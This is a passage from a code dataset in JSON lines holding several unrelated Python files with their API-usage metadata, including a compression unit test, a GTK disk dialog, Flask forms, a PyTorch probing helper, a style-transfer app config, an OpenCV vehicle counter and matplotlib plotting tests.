"call"}, {"api_name": "numpy.zeros", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 103, "usage_type": "call"}, {"api_name": "src.data_utils.Support.positions_in_local_frame", "line_number": 113, "usage_type": "call"}, {"api_name": "src.data_utils.Support", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 192, "usage_type": "call"}, {"api_name": "scipy.linalg.hankel", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 208, "usage_type": "call"}]} +{"seq_id": "12313019075", "text": "import logging\nimport os\nimport random\nimport sys\nimport unittest\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(\n __file__.decode(sys.getfilesystemencoding()))))\nsys.path.insert(0, ROOT_DIR)\n\nfrom utils import large\n\n\nclass LargeTest(unittest.TestCase):\n def test_1m_1(self):\n array = range(1000000)\n data = large.pack(array)\n self.assertGreater(1000, len(data))\n self.assertEqual(array, large.unpack(data))\n\n def test_1m_1000(self):\n array = [i*1000 for i in xrange(1000000)]\n data = large.pack(array)\n self.assertGreater(2000, len(data))\n self.assertEqual(array, large.unpack(data))\n\n def test_1m_pseudo(self):\n # Compresses a pseudo-random suite. 
Still compresses very well.\n random.seed(0)\n array = sorted(random.randint(0, 1000000) for _ in xrange(1000000))\n data = large.pack(array)\n self.assertGreater(302000, len(data))\n self.assertEqual(array, large.unpack(data))\n\n def test_empty(self):\n self.assertEqual('', large.pack([]))\n self.assertEqual([], large.unpack(''))\n\n\nif __name__ == '__main__':\n VERBOSE = '-v' in sys.argv\n logging.basicConfig(level=logging.DEBUG if VERBOSE else logging.ERROR)\n unittest.main()\n", "repo_name": "kiwibrowser/src", "sub_path": "tools/swarming_client/tests/large_test.py", "file_name": "large_test.py", "file_ext": "py", "file_size_in_byte": 1193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2475, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.getfilesystemencoding", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 14, "usage_type": "attribute"}, {"api_name": "utils.large.pack", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 17, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 19, "usage_type": "name"}, {"api_name": "utils.large.pack", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 25, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "utils.large.pack", "line_number": 31, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 31, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 33, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.large.pack", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 36, "usage_type": "name"}, {"api_name": "utils.large.unpack", "line_number": 37, "usage_type": "call"}, {"api_name": "utils.large", "line_number": 37, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 41, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 42, "usage_type": "attribute"}, {"api_name": "unittest.main", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "19095813728", "text": "import glib\nfrom gi.repository import Gtk\nimport operator\n\nclass SelectedDisksDialog(object):\n COL_OBJECT = 0\n COL_NAME = 1\n COL_CAPACITY = 2\n COL_FREE = 3\n COL_ID = 4\n SUMMARY_TEMPLATE=\"<b>%(count)d disks; %(capacity).1f GB capacity; \" \\\n \"%(free).1f GB free space</b> (unpartitioned & filesystems)\"\n\n def __init__(self):\n builder = Gtk.Builder()\n builder.add_from_file(\"selected_disks.glade\")\n builder.connect_signals(self)\n self.window = builder.get_object(\"selected_disks_dialog\")\n self.view = 
builder.get_object(\"treeview_disks\")\n self.store = builder.get_object(\"treestore_disks\")\n self.label = builder.get_object(\"label_summary\")\n self.store.set_sort_func(self.COL_CAPACITY, self._cmp_device, \"size\")\n self.store.set_sort_func(self.COL_FREE, self._cmp_device, \"size\")\n\n def _append_device(self, device, it_parent):\n it = self.store.append(it_parent)\n self.store.set_value(it, self.COL_OBJECT, device)\n self.store.set_value(it, self.COL_NAME, device.model)\n self.store.set_value(it, self.COL_CAPACITY, \"%d GB\" % (device.size / 1000))\n self.store.set_value(it, self.COL_FREE, \"%d GB\" % (device.size / 1000))\n self.store.set_value(it, self.COL_ID, device.serial)\n\n def _cmp_device(self, model, a_iter, b_iter, attr):\n def compute_for_iter(it):\n device = self.store.get_value(it, self.COL_OBJECT)\n if device:\n return getattr(device, attr)\n # if this is a category, compute the sum of attr over the children\n acc = 0\n it_children = self.store.iter_children(it)\n while it_children:\n acc += compute_for_iter(it_children)\n it_children = self.store.iter_next(it_children)\n return acc\n\n return compute_for_iter(a_iter) - compute_for_iter(b_iter)\n\n def _update_label(self):\n vals = {\n \"count\" : len(list(self.iter_device_rows())),\n \"capacity\" : reduce(lambda acc, row: acc + row[self.COL_OBJECT].size,\n self.iter_device_rows(), 0) / 1000,\n \"free\" : reduce(lambda acc, row: acc + row[self.COL_OBJECT].size,\n self.iter_device_rows(), 0) / 1000\n }\n self.label.set_markup(self.SUMMARY_TEMPLATE % vals)\n\n def cb_close(self, button):\n self.window.destroy()\n\n def cb_remove(self, button):\n path = self.view.get_cursor()[0]\n it = self.store.get_iter(path)\n self.store.remove(it)\n self.update()\n\n def iter_device_rows(self):\n \"\"\" Iterator for those rows of model that represent a real device. \"\"\"\n return (it for it in self.store)\n\n def populate(self, devices):\n map(lambda d : self._append_device(d, None), devices)\n self.update()\n self.view.set_show_expanders(False)\n\n def run(self):\n self.window.show_all()\n self.window.run()\n self.window.destroy()\n return [r[self.COL_OBJECT] for r in self.iter_device_rows()]\n\n def update(self):\n self._update_label()\n\nclass SelectedDisksTreeDialog(SelectedDisksDialog):\n def iter_device_rows(self):\n \"\"\" Iterator for those rows of model that represent a real device.\n\n Categories, namely, are excluded.\n \"\"\"\n for category in self.store:\n for it in category.iterchildren():\n yield it\n\n def _update_categories(self):\n \"\"\" Delete categories with no child. 
\"\"\"\n categories = 0\n it = self.store.get_iter_first()\n while it:\n if self.store.iter_has_child(it):\n categories += 1\n it = self.store.iter_next(it)\n else:\n if not self.store.remove(it):\n break\n\n def populate(self, devices):\n types = {d.type : None for d in devices}\n for t in types:\n types[t] = self.store.append(None)\n self.store.set_value(types[t], self.COL_NAME, t)\n map(lambda d: self._append_device(d, types[d.type]), devices)\n self.update()\n self.view.expand_all()\n\n def update(self):\n self._update_categories()\n self._update_label()\n", "repo_name": "akozumpl/selected_disks", "sub_path": "selected_disks_dialog.py", "file_name": "selected_disks_dialog.py", "file_ext": "py", "file_size_in_byte": 4299, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gi.repository.Gtk.Builder", "line_number": 15, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "30406776745", "text": "from flask_wtf import FlaskForm\r\nfrom wtforms import SubmitField, StringField, FloatField, SelectMultipleField, SelectField\r\nfrom wtforms.validators import InputRequired, Length\r\n\r\nimport Project_define as pk_db\r\n\r\nfrom sqlalchemy.orm import sessionmaker\r\nSession = sessionmaker(bind = pk_db.engine)\r\nsession = Session()\r\n\r\ncompany_list = session.query(pk_db.Company).all()\r\ncompany_choices = []\r\nfor item in company_list:\r\n mylist=[]\r\n mylist.append(str(item.id))\r\n mylist.append(\"{}\".format(item.name))\r\n my_tuple = tuple(mylist)\r\n company_choices.append(my_tuple)\r\n\r\nproduct_list = session.query(pk_db.Product).all()\r\nproduct_choices = []\r\nfor item in product_list:\r\n mylist=[]\r\n mylist.append(str(item.id))\r\n mylist.append(\"{}\".format(item.name))\r\n my_tuple = tuple(mylist)\r\n product_choices.append(my_tuple)\r\n\r\ncustomer_list = session.query(pk_db.Customer).all()\r\ncustomer_choices = []\r\nfor item in customer_list:\r\n mylist=[]\r\n mylist.append(str(item.id))\r\n mylist.append(\"{}\".format(item.name))\r\n my_tuple = tuple(mylist)\r\n customer_choices.append(my_tuple)\r\n\r\nclass Sold_To(FlaskForm):\r\n customer_id = SelectField(\"Customer\", choices = customer_choices)\r\n product_id = SelectMultipleField(\"Product\", choices = product_choices)\r\n submit = SubmitField(\"Add sell\")\r\n\r\nclass Delete_Customer(FlaskForm):\r\n customer_id = SelectField(\"Customer \", choices = customer_choices) \r\n submit = SubmitField(\"Delete Customer\")\r\n", "repo_name": "PavloKuK/Companies-and-Customers", "sub_path": "Project_forms.py", "file_name": "Project_forms.py", "file_ext": "py", "file_size_in_byte": 1461, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 8, "usage_type": "call"}, {"api_name": "Project_define.engine", "line_number": 8, "usage_type": "attribute"}, {"api_name": "Project_define.Company", "line_number": 11, "usage_type": "attribute"}, {"api_name": "Project_define.Product", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Project_define.Customer", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 38, "usage_type": "name"}, {"api_name": "wtforms.SelectField", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.SelectMultipleField", "line_number": 40, "usage_type": "call"}, {"api_name": 
"wtforms.SubmitField", "line_number": 41, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 43, "usage_type": "name"}, {"api_name": "wtforms.SelectField", "line_number": 44, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "19827577119", "text": "\"\"\"Gather information about pretrained model by forwarding sample batches.\"\"\"\nimport typing as t\nimport contextlib\nimport warnings\nimport functools\n\nimport torch\n\nfrom ..adapters import base as adapters_base\n\n\n__all__ = [\n \"run_inspection_batches\",\n]\n\n\nTensorType = t.Union[torch.Tensor, tuple[torch.Tensor, ...], dict[str, t.Any]]\n\n\nclass _AnalyzerContainer:\n \"\"\"Container for information gathered while exploring pretrained model.\"\"\"\n\n def __init__(self) -> None:\n self.unnecessary_cand: list[tuple[str, torch.nn.Module]] = []\n self.probing_input_dims: dict[str, tuple[int, ...]] = {}\n\n # Note: it is necessary to keep a collection of 'modules that can not be ignored' since\n # modules are reused.\n self.cant_be_ignored: set[tuple[str, torch.nn.Module]] = set()\n\n def dismiss_unnecessary_cand(self) -> \"_AnalyzerContainer\":\n \"\"\"Clear current unnecessary module candidates, and mark then as `can't be ignored`.\"\"\"\n self.cant_be_ignored.update(self.unnecessary_cand)\n self.unnecessary_cand.clear()\n return self\n\n def register_output_shape(self, module_name: str, m_output: TensorType) -> \"_AnalyzerContainer\":\n \"\"\"Register output shape for the given module.\"\"\"\n if torch.is_tensor(m_output):\n m_output = (m_output,) # type: ignore\n\n out_shapes: tuple[int, ...] = tuple(\n item.shape[-1] for item in m_output if hasattr(item, \"shape\") # type: ignore\n )\n\n if not out_shapes:\n info_types = tuple(map(type, m_output))\n info_keys = (\n f\" and keys {tuple(m_output.keys())}\" # type: ignore\n if issubclass(type(m_output), dict)\n else \"\"\n )\n\n raise TypeError(\n f\"Could not infer output shape from probed module '{module_name}' (with outputs \"\n f\"of type {info_types}{info_keys}). If type seems correct, you can \"\n \"provide the probing input dimensions as:\\n\\n curiosidade.attach_probers(..., \"\n f\"modules_input_dim={{'{module_name}': INPUT_DIM)}}.\\n\"\n \"In case the output types are incorrect, please make sure you are probing the \"\n \"correct module.\"\n )\n\n self.probing_input_dims[module_name] = out_shapes\n\n return self\n\n\n@contextlib.contextmanager\ndef analyze_modules(\n base_model: adapters_base.BaseAdapter,\n probed_modules: t.Set[str],\n known_output_dims: t.FrozenSet[str],\n) -> t.Iterator[_AnalyzerContainer]:\n \"\"\"Insert temporary hooks in pretrained model to collect information.\"\"\"\n pre_hooks: list[torch.utils.hooks.RemovableHandle] = []\n post_hooks: list[torch.utils.hooks.RemovableHandle] = []\n\n channel_container = _AnalyzerContainer()\n channel_container.cant_be_ignored.add((\"\", base_model.get_torch_module()))\n\n def hook_pre_fn(\n module: torch.nn.Module, *args: t.Any, module_name: str, **kwargs: t.Any\n ) -> None:\n # pylint: disable='unused-argument'\n # A module started its forward (may be probed or not)\n # Should it be ignored?\n # - If it is a probed module, it will eventually ends and clear everything, so no\n # need to worry anyway.\n # - If it is not a probed module:\n # - If it is within a probed module, it will end and clear this module. Ok.\n # - If it is not within a probled module, good candidate to prune. 
Ok.\n # Ok.\n channel_container.unnecessary_cand.append((module_name, module))\n\n def hook_post_fn(\n module: torch.nn.Module,\n m_input: TensorType,\n m_output: TensorType,\n module_name: str,\n **kwargs: t.Any,\n ) -> None:\n # pylint: disable='unused-argument'\n # Probed module ended now, therefore nothing can be ignored up to this point.\n channel_container.dismiss_unnecessary_cand()\n\n if module_name not in known_output_dims:\n channel_container.register_output_shape(module_name, m_output)\n\n elif issubclass(type(m_output), dict):\n info_keys = tuple(m_output.keys()) # type: ignore\n warnings.warn(\n f\"Module '{module}' output is a dictionary with keys {info_keys}. \"\n \"Every dictionary item is going to be an input argument for your probing model's \"\n \"forward method. Please take this into consideration while specifying its \"\n \"method signature.\",\n RuntimeWarning,\n )\n\n for module_name, module in base_model.named_modules():\n fn_module = functools.partial(hook_pre_fn, module_name=module_name)\n pre_hooks.append(module.register_forward_pre_hook(fn_module))\n\n if module_name in probed_modules:\n fn_module = functools.partial(hook_post_fn, module_name=module_name)\n post_hooks.append(module.register_forward_hook(fn_module))\n\n try:\n yield channel_container\n\n finally:\n while pre_hooks:\n pre_hooks.pop().remove()\n\n while post_hooks:\n post_hooks.pop().remove()\n\n\ndef run_inspection_batches(\n sample_batches: t.Sequence[t.Any],\n base_model: adapters_base.BaseAdapter,\n probed_modules: t.Collection[str],\n known_output_dims: t.Optional[t.Collection[str]] = None,\n) -> dict[str, t.Any]:\n \"\"\"Gather information about pretrained model by forwaring sample batches.\n\n Function used to infer probing input dimensions, and also detect pretrained modules\n unnecessary to train probing models.\n\n Parameters\n ----------\n sample_batches : t.Sequence[t.Any]\n Sample batches to forward to the pretrained model. Only a single batch should suffice, but\n additional batches may be used to detect any form of non-deterministic behaviour in the\n forward phase of the pretrained model. If this is the case, pretrained modules will be\n deemed unnecessary to train probing models, at the expense of extra computational cost.\n\n base_model : adapters.base.BaseAdapter\n Properly adapted (or even extended) pretrained model to probe.\n\n probed_modules : t.Collection[str]\n Names of all modules that will be probed.\n\n known_output_dims : t.Collection[str] or None, default=None\n Known output dimensions of probed layers. Used to avoid throwing exceptions when an\n output dimension has not been successfully inferred.\n\n Returns\n -------\n inspection_results : dict[str, t.Any]\n Dictionary containing information about pretrained model architecture, containing the\n following keys:\n\n - `probing_input_dims`: dictionary mapping probed modules to its input dimensions (tuples).\n - `unnecessary_modules`: tuple containing all modules deemed unnecessary for probing model\n training, following the (module_name, module_reference) pair format.\n \"\"\"\n base_model.eval()\n\n known_output_dims = known_output_dims or frozenset()\n known_output_dims = frozenset(known_output_dims)\n\n unnecessary_modules: tuple[tuple[str, torch.nn.Module], ...] 
= tuple()\n probing_input_dims: dict[str, tuple[int, ...]] = {}\n\n probed_set = set(probed_modules)\n\n if torch.is_tensor(sample_batches):\n sample_batches = [sample_batches]\n\n with torch.no_grad(), analyze_modules(\n base_model, probed_set, known_output_dims\n ) as channel_container:\n for sample_batch in sample_batches:\n input_feats, _ = base_model.break_batch(sample_batch)\n base_model(input_feats)\n temp = tuple(\n item\n for item in channel_container.unnecessary_cand\n if item and item not in channel_container.cant_be_ignored\n )\n\n non_deterministic_behaviour_flag = unnecessary_modules and temp != unnecessary_modules\n\n if non_deterministic_behaviour_flag:\n warnings.warn(\n message=(\n \"Non-deterministic behaviour detected while inferring unnecessary modules \"\n \"for prober training. Will not prune any module, and the full model will \"\n \"be loaded in the chosen device.\"\n ),\n category=UserWarning,\n )\n unnecessary_modules = tuple()\n break\n\n unnecessary_modules = temp\n probing_input_dims = channel_container.probing_input_dims\n\n out = {\n \"probing_input_dims\": probing_input_dims,\n \"unnecessary_modules\": unnecessary_modules,\n }\n\n return out\n", "repo_name": "ulysses-camara/ulysses-curiosity", "sub_path": "curiosidade/helpers/flow_analyzer.py", "file_name": "flow_analyzer.py", "file_ext": "py", "file_size_in_byte": 8649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Union", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.is_tensor", "line_number": 39, "usage_type": "call"}, {"api_name": "adapters.base.BaseAdapter", "line_number": 70, "usage_type": "attribute"}, {"api_name": "adapters.base", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 71, "usage_type": "attribute"}, {"api_name": "typing.FrozenSet", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.utils", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 96, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 100, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 111, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 120, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 124, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 68, "usage_type": "attribute"}, {"api_name": "typing.Iterator", "line_number": 73, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 139, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 139, "usage_type": "attribute"}, {"api_name": "adapters.base.BaseAdapter", "line_number": 140, "usage_type": "attribute"}, {"api_name": "adapters.base", "line_number": 140, "usage_type": "name"}, {"api_name": "typing.Collection", "line_number": 141, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 142, 
"usage_type": "attribute"}, {"api_name": "typing.Collection", "line_number": 142, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 182, "usage_type": "attribute"}, {"api_name": "torch.is_tensor", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 190, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 205, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 143, "usage_type": "attribute"}]} +{"seq_id": "21489657998", "text": "import os\nfrom pathlib import Path\nfrom django.apps import AppConfig\nfrom .fast_style import load_model\nfrom typing import Optional, Any\n\n\ndef scan_models(dir):\n models = {}\n for root, sunfolders, files in os.walk(dir):\n for file in files:\n if models.get(Path(root).name):\n if file.endswith(\".pth\"):\n models[Path(root).name].append(str(Path(root)/file))\n else:\n if file.endswith(\".pth\"):\n models[Path(root).name] = [str(Path(root)/file)]\n return models\n\n\nclass StyleTransferConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'style_transfer'\n model_paths = scan_models('models/')\n models = {}\n for type, paths_list in model_paths.items():\n if type != \"experimental\":\n for path in paths_list:\n models[path] = load_model(path)\n", "repo_name": "AyushExel/starrynight", "sub_path": "backend/style_transfer/apps.py", "file_name": "apps.py", "file_ext": "py", "file_size_in_byte": 909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.apps.AppConfig", "line_number": 21, "usage_type": "name"}, {"api_name": "fast_style.load_model", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "8136054328", "text": "import cv2\r\nimport glob\r\nfrom vehicle_detector import VehicleDetector\r\n\r\ndef count(img_add):\r\n # Load Veichle Detector\r\n vd = VehicleDetector()\r\n\r\n # Load images from a folder\r\n img=cv2.imread(img_add)\r\n\r\n # Loop through all the images\r\n vehicle_boxes = vd.detect_vehicles(img)\r\n vehicle_count = len(vehicle_boxes)\r\n time=15\r\n if(vehicle_count<=20):\r\n time+=int(1.3*vehicle_count)-10\r\n else :\r\n if(vehicle_count>20 and vehicle_count<35):\r\n time+=int(vehicle_count*1.43)-10\r\n else:\r\n time=150\r\n\r\n for box in vehicle_boxes:\r\n x, y, w, h = box\r\n\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (25, 0, 180), 3)\r\n\r\n cv2.putText(img, \"Vehicles: \" + str(vehicle_count), (20, 50), 0, 2, (100, 200, 0), 3)\r\n cv2.putText(img, \"Timer: \" + str(time),(20,110),0,2,(255,255,255),3)\r\n cv2.imwrite(img_add,img)\r\n cv2.destroyAllWindows()\r\n #cv2.imshow(\"Cars\", img)\r\n #cv2.waitKey(0)\r\n", "repo_name": "aftabahmed-09/ATST", "sub_path": "flaskk/vehicle_counting.py", "file_name": "vehicle_counting.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "vehicle_detector.VehicleDetector", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 29, 
"usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "27226088464", "text": "from enum import Enum\nfrom pydantic import BaseSettings, Field\n\nfrom shared.config.cors import CORSSettings\n\n\nclass ApplicationEnvironment(str, Enum):\n LOCAL = \"local\"\n DEV = \"dev\"\n PROD = \"prod\"\n TEST = \"test\"\n\n\nclass ApplicationSettings(BaseSettings):\n env: ApplicationEnvironment = Field(default=ApplicationEnvironment.LOCAL, env=\"APP_ENV\")\n cors: CORSSettings = CORSSettings()\n", "repo_name": "NEONKID/cookiecutter-nk-fastapi", "sub_path": "{{cookiecutter.project_slug}}/shared/config/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 399, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 7, "usage_type": "name"}, {"api_name": "pydantic.BaseSettings", "line_number": 14, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 15, "usage_type": "call"}, {"api_name": "shared.config.cors.CORSSettings", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "91875639", "text": "from figures.myfigure import MyFigure\nfrom figures.utils import get_data_dir\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport os\nimport pytest\n\nclass TestVectorField:\n '''\n '''\n @pytest.fixture\n def dir_path(self):\n ''' returns dir path for the test plots\n '''\n dir_path = os.path.join(get_data_dir(), 'vector_field')\n return dir_path\n\n @pytest.fixture\n # https://matplotlib.org/stable/gallery/images_contours_and_fields/\n # quiver_simple_demo.html#sphx-glr-gallery-images-contours-and-fields-quiver-simple-demo-py\n def setting_1(self):\n ''' returns tuple (X, Y)\n '''\n x = y = np.arange(0, 2 * np.pi, .2)\n X, Y = np.meshgrid(x, y, indexing='ij')\n U = np.cos(X)\n V = np.sin(Y)\n return X, Y, U, V\n\n #@pytest.mark.skip(reason='')\n def test_quiver(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver',\n )\n X, Y, U, V = setting_1\n fig.vector_field(X, Y, U, V)\n\n def test_quiver_limits(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver_limits',\n )\n X, Y, U, V = setting_1\n fig.set_xlim(0, 3)\n fig.set_ylim(0, 3)\n fig.vector_field(X, Y, U, V)\n\n def test_quiver_scale(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver_scale',\n )\n X, Y, U, V = setting_1\n\n # a smaller scale parameter makes the arrow longer\n fig.vector_field(X, Y, U, V, scale=10)\n\n def test_quiver_width(self, dir_path, setting_1):\n '''\n '''\n fig = plt.figure(\n FigureClass=MyFigure,\n dir_path=dir_path,\n file_name='quiver_width',\n )\n X, Y, U, V = setting_1\n\n # a smaller scale parameter makes the arrow longer\n fig.vector_field(X, Y, U, V, width=0.01)\n", "repo_name": "riberaborrell/pyplot-my-figure", "sub_path": "tests/test_vector_field.py", "file_name": "test_vector_field.py", "file_ext": "py", "file_size_in_byte": 2170, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, 
"usage_type": "attribute"}, {"api_name": "figures.utils.get_data_dir", "line_number": 16, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.meshgrid", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "figures.myfigure.MyFigure", "line_number": 73, "usage_type": "name"}]} +{"seq_id": "75326361124", "text": "from os import terminal_size\nfrom typing import Union\nfrom typing import Iterable, Optional\nimport jax \n\nimport gym\nimport gym.spaces\nimport 